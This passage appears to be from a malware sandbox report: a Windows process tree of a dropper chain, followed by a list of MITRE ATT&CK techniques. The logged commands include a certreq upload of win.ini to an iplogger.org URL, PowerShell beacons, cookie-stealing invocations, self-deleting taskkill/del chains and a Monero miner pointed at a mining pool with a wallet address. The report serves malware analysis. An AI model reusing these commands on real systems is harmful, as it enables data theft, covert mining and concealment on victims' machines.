        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1612,616311985310121319,2674027892819348637,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=852 /prefetch:2
        10⤵
        
        PID:8728
        
        C:\Users\Admin\AppData\Local\Temp\2rjbrniwhpk\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2rjbrniwhpk\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:5452
        
        C:\Users\Admin\AppData\Local\Temp\is-GS5U8.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GS5U8.tmp\Setup3310.tmp" /SL5="$30436,802346,56832,C:\Users\Admin\AppData\Local\Temp\2rjbrniwhpk\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:6116
        
        C:\Users\Admin\AppData\Local\Temp\is-RQTH4.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-RQTH4.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Local\Temp\is-G5GFO.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-G5GFO.tmp\Setup.tmp" /SL5="$60502,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-RQTH4.tmp\Setup.exe" /Verysilent
        11⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\is-1DUS3.tmp\ProPlugin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-1DUS3.tmp\ProPlugin.exe" /Verysilent
        12⤵
        
        PID:7668
        
        C:\Users\Admin\AppData\Local\Temp\is-06TU7.tmp\ProPlugin.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-06TU7.tmp\ProPlugin.tmp" /SL5="$1057C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-1DUS3.tmp\ProPlugin.exe" /Verysilent
        13⤵
        
        PID:7764
        
        C:\Users\Admin\AppData\Local\Temp\is-JDAB4.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-JDAB4.tmp\Setup.exe"
        14⤵
        
        PID:8580
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
        15⤵
        
        PID:8708
        
        C:\Users\Admin\AppData\Local\Temp\is-1DUS3.tmp\Delta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-1DUS3.tmp\Delta.exe" /Verysilent
        12⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\is-B1OS8.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-B1OS8.tmp\Delta.tmp" /SL5="$50386,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-1DUS3.tmp\Delta.exe" /Verysilent
        13⤵
        
        PID:5752
        
        C:\Users\Admin\AppData\Local\Temp\is-4PVQQ.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-4PVQQ.tmp\Setup.exe" /VERYSILENT
        14⤵
        
        PID:9292
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-4PVQQ.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
        15⤵
        
        PID:9844
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Setup.exe /f
        16⤵
        Kills process with taskkill
        
        PID:9956
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        16⤵
        Delays execution with timeout.exe
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\is-1DUS3.tmp\zznote.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-1DUS3.tmp\zznote.exe" /Verysilent
        12⤵
        
        PID:9308
        
        C:\Users\Admin\AppData\Local\Temp\is-BMS5S.tmp\zznote.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BMS5S.tmp\zznote.tmp" /SL5="$60386,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-1DUS3.tmp\zznote.exe" /Verysilent
        13⤵
        
        PID:9324
        
        C:\Users\Admin\AppData\Local\Temp\is-CMJM7.tmp\jg4_4jaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-CMJM7.tmp\jg4_4jaa.exe" /silent
        14⤵
        
        PID:9760
        
        C:\Users\Admin\AppData\Local\Temp\is-1DUS3.tmp\hjjgaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-1DUS3.tmp\hjjgaa.exe" /Verysilent
        12⤵
        
        PID:10116
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:9332
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:8112
        
        C:\Users\Admin\AppData\Local\Temp\lteg5bc152p\lxcqsoxmgsc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lteg5bc152p\lxcqsoxmgsc.exe" /ustwo INSTALL
        8⤵
        
        PID:5288
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 660
        9⤵
        Program crash
        
        PID:6428
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 664
        9⤵
        Program crash
        
        PID:4256
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 656
        9⤵
        Program crash
        
        PID:4800
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 788
        9⤵
        Program crash
        
        PID:3464
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 916
        9⤵
        Program crash
        
        PID:2024
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 996
        9⤵
        Program crash
        
        PID:7912
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1180
        9⤵
        Program crash
        
        PID:6104
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1196
        9⤵
        Program crash
        
        PID:6900
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1308
        9⤵
        Program crash
        
        PID:6864
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1288
        9⤵
        Program crash
        
        PID:7144
        
        C:\Users\Admin\AppData\Local\Temp\sbhnn543i1c\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sbhnn543i1c\chashepro3.exe" /VERYSILENT
        8⤵
        
        PID:3048
        
        C:\Users\Admin\AppData\Local\Temp\is-BRRDC.tmp\chashepro3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BRRDC.tmp\chashepro3.tmp" /SL5="$703EA,2012497,58368,C:\Users\Admin\AppData\Local\Temp\sbhnn543i1c\chashepro3.exe" /VERYSILENT
        9⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/1aSny7"
        10⤵
        
        PID:7160
        
        C:\Program Files (x86)\JCleaner\8.exe
        
        "C:\Program Files (x86)\JCleaner\8.exe"
        10⤵
        
        PID:7972
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c echo grYNxrw
        11⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
        11⤵
        
        PID:3608
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        12⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
        
        Fai.com Far.xlt
        13⤵
        
        PID:9468
        
        C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
        
        C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com Far.xlt
        14⤵
        
        PID:9764
        
        C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
        
        C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
        15⤵
        
        PID:8208
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9764 -s 860
        15⤵
        Program crash
        
        PID:5608
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 30
        13⤵
        Runs ping.exe
        
        PID:5264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
        10⤵
        
        PID:2164
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/1EaGq7"
        10⤵
        
        PID:6992
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
        10⤵
        
        PID:7064
        
        C:\Windows\SysWOW64\certreq.exe
        
        certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
        11⤵
        
        PID:7944
        
        C:\Program Files (x86)\JCleaner\Venita.exe
        
        "C:\Program Files (x86)\JCleaner\Venita.exe"
        10⤵
        
        PID:7136
        
        C:\Program Files (x86)\JCleaner\Venita.exe
        
        "{path}"
        11⤵
        
        PID:9900
        
        C:\Program Files (x86)\JCleaner\Venita.exe
        
        "{path}"
        11⤵
        
        PID:9912
        
        C:\Program Files (x86)\JCleaner\Brava.exe
        
        "C:\Program Files (x86)\JCleaner\Brava.exe"
        10⤵
        
        PID:5988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
        10⤵
        
        PID:8732
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
        10⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\certreq.exe
        
        certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
        11⤵
        
        PID:5916
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      PID:4684
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      Executes dropped EXE
      PID:4996
    - - C:\Users\Admin\AppData\Roaming\C181.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\C181.tmp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4200
      - C:\Users\Admin\AppData\Roaming\C181.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\C181.tmp.exe"
        6⤵
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3460
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        
        PID:4060
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:804
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      Executes dropped EXE
      PID:3444
    - - C:\ProgramData\6135333.67
        
        "C:\ProgramData\6135333.67"
        5⤵
        Executes dropped EXE
        
        PID:4564
    - - C:\ProgramData\6606121.72
        
        "C:\ProgramData\6606121.72"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4372
      - C:\ProgramData\Windows Host\Windows Host.exe
        
        "C:\ProgramData\Windows Host\Windows Host.exe"
        6⤵
        Executes dropped EXE
        
        PID:5024
    - - C:\ProgramData\6733583.74
        
        "C:\ProgramData\6733583.74"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Drops startup file
        Adds Run key to start application
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4520
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        Executes dropped EXE
        
        PID:5948
    - - C:\ProgramData\6703882.73
        
        "C:\ProgramData\6703882.73"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3184
      - C:\ProgramData\6703882.73
        
        "{path}"
        6⤵
        Executes dropped EXE
        
        PID:3316
      - C:\ProgramData\6703882.73
        
        "{path}"
        6⤵
        Executes dropped EXE
        
        PID:4424
      - C:\ProgramData\6703882.73
        
        "{path}"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:4224
    - - C:\ProgramData\6390258.70
        
        "C:\ProgramData\6390258.70"
        5⤵
        Executes dropped EXE
        
        PID:4612
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:4768
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:4260
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:5408

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2200
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C955864E8614DC6375BB1F2CF5B5A2F2 C
  2⤵
  - Loads dropped DLL
  PID:2716

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:2520
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{78b7cb39-4f69-1a43-bdff-ef5f49622d6d}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies data under HKEY_USERS
  PID:6396
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
  2⤵
  - Drops file in Drivers directory
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  PID:6732

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:6016

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:6788

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:6452
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:4560

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:368

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4568

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7096

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3464

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6264

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5040

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5760

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6712

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7404

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8304

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8832

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9572

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0xf8
1⤵
PID:9972

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5584

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9104

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6872

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Bootkit

T1067

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery